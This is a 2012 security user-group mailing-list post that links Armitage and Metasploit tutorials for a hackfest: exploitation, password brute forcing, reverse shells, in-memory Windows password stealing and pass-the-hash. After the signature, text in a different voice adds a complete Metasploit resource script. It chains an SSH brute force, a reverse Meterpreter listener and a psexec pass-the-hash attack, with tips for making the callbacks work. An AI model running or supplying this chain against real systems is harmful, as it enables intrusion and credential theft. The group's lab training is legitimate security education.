[Plug-security] Step X Step Solutions for December's hackfest (Armitage/MetaSploit/Meterpreter)

Lisa Kachold lisakachold at obnosis.com
Sat Dec 8 19:17:44 MST 2012


We have concentrated on network and client-side attacks over the last
couple of months, using tools like Metasploit/Armitage (with all of the
plugins, including nmap and meterpreter).  However, we mutter and wander
when we get to the actual exploitation with Metasploit/Armitage.  We therefore
provide some good examples below:

Armitage Manual:  Pay special attention to Section 5 Exploitation and
Meterpreter General Payload.  Section 7.6 shows how to do password brute
forcing (for ssh/ftp, for instance):
http://www.fastandeasyhacking.com/manual#4

Armitage tutorial for beginners (if you watch nothing else, this will help
you learn):
http://www.youtube.com/watch?v=hbtkKEiYGrw

The following is an example of a full attack using Armitage/Metasploit (all
of this was possible with the ftp attack on XP today):
Munge 2011 on Hak5: http://www.youtube.com/watch?v=Z0x_O75tRAU
skip forward to 8:30
skip forward to 11:50 for actual session interaction
25:00 pass the hash attack (get adjacent domain servers)

Here's another screen X screen use of Armitage:
http://www.youtube.com/watch?v=AG_MeOsnQwM
Remember the host graphic turns red when successful!
Use the meterpreter menu to get a session in Windows

Munge 2012 using new options in Armitage and Metasploit 4:
http://www.youtube.com/watch?v=kC3wpe3t_qg

Setting up and using Armitage/Metasploit on Windows:
http://www.youtube.com/watch?v=EmDQnavYFgI

*A reverse shell WAS available on 2 of our systems, if we set a payload for
it:*

Stealing Windows Passwords with Metasploit (Smartlocker)  [winlogon.exe]
hook (sly - all in memory); requires administrator to invoke (auto bgrun in
background):
http://www.youtube.com/watch?v=vC6wmmgp20M
skip forward to 10:50 / 12:30
(railgun grab to windows api)

Questions?  Discussion?


See you on the 2nd Saturday of the Month at DeVry University 11-2PM.
-- 

(503) 754-4452 Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice
it-clowns.com
Chief Clown
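Since the post says the sticking point is "the actual exploitation" rather than the scanning, here is an added example (not from the original post, and not taken from any of the linked videos) that strings the three pieces the post points at into one Metasploit resource script: the section 7.6 style password brute force, the reverse Meterpreter handler that has to exist before "setting a payload for it" does anything, and the pass-the-hash step from the Munge video. Module names and option names are the stock ones in Metasploit 4 of that era; the lab addresses (192.168.56.x), the wordlist paths and the hash value are placeholders I made up for the example (the hash is the well-known empty LM:NTLM pair, not a real credential). Run it with `msfconsole -q -r hackfest.rc`.

```msf
# hackfest.rc -- added example, not part of the original post.
# Lab addresses, wordlist paths and the hash below are assumptions.

# 1. Password brute force against SSH (the GUI equivalent is Armitage
#    manual section 7.6). USER_FILE/PASS_FILE are wordlists you supply.
#    STOP_ON_SUCCESS stops the scan after the first valid login instead
#    of hammering the box with the rest of the list.
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.56.101
set USER_FILE /tmp/users.txt
set PASS_FILE /tmp/passwords.txt
set STOP_ON_SUCCESS true
set VERBOSE false
run

# 2. Listener for a reverse Meterpreter payload. Whatever exploit you
#    fire at the target must use the same PAYLOAD/LHOST/LPORT; a reverse
#    shell with no handler listening has nowhere to call back to.
#    ExitOnSession false keeps the handler up for more than one callback,
#    and -j runs it as a background job so the console stays usable.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 4444
set ExitOnSession false
exploit -j

# 3. Pass the hash to an adjacent Windows host. SMBPass accepts the
#    LM:NTLM pair exactly as hashdump prints it, so no cracking is needed.
#    The value here is the empty-password hash pair, used only as a
#    constructed placeholder. Needs a local admin account on the target
#    and SMB (445) reachable from the attacking box.
use exploit/windows/smb/psexec
set RHOST 192.168.56.102
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 4445
exploit -j
```

Two caveats a practitioner wants here: LHOST must be an address the target can actually route back to (a VPN or VirtualBox host-only address, not 127.0.0.1), and the pass-the-hash step only works with hashes pulled from a box where you already have SYSTEM (hashdump from a Meterpreter session), which is why step 2 has to succeed before step 3 is worth trying.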